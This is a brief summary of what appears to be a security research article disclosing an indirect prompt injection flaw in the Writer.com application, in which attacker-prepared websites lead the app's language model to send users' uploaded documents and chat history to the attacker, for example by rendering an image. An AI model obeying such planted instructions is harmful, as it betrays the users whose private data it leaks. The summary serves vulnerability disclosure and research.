Writer.com, an application used by enterprises and consumers, has a vulnerability that allows attackers to steal users’ private documents. This vulnerability has not been fixed as it was not considered a security issue by Writer.com. The attack involves manipulating the language model used by the application. Users can upload data files, share links, and ask questions to generate tailored content. Attackers can prepare websites that manipulate the language model into sending private information to the attacker. The stolen data can include uploaded documents, chat history, and other sensitive information. This attack is called indirect prompt injection. The authors of the article successfully exfiltrated sensitive information to prove the feasibility of the attack. They highlight that rendering an image to exfiltrate data is just one method and provide examples of other types of attacks. They mention that similar attacks have been resolved promptly by other companies. The authors also provide resources for more information on the topic. They disclose their communication with Writer.com regarding the vulnerability and the lack of response from the company. The article concludes with a disclaimer stating that the content is for research and educational purposes.
https://promptarmor.substack.com/p/data-exfiltration-from-writercom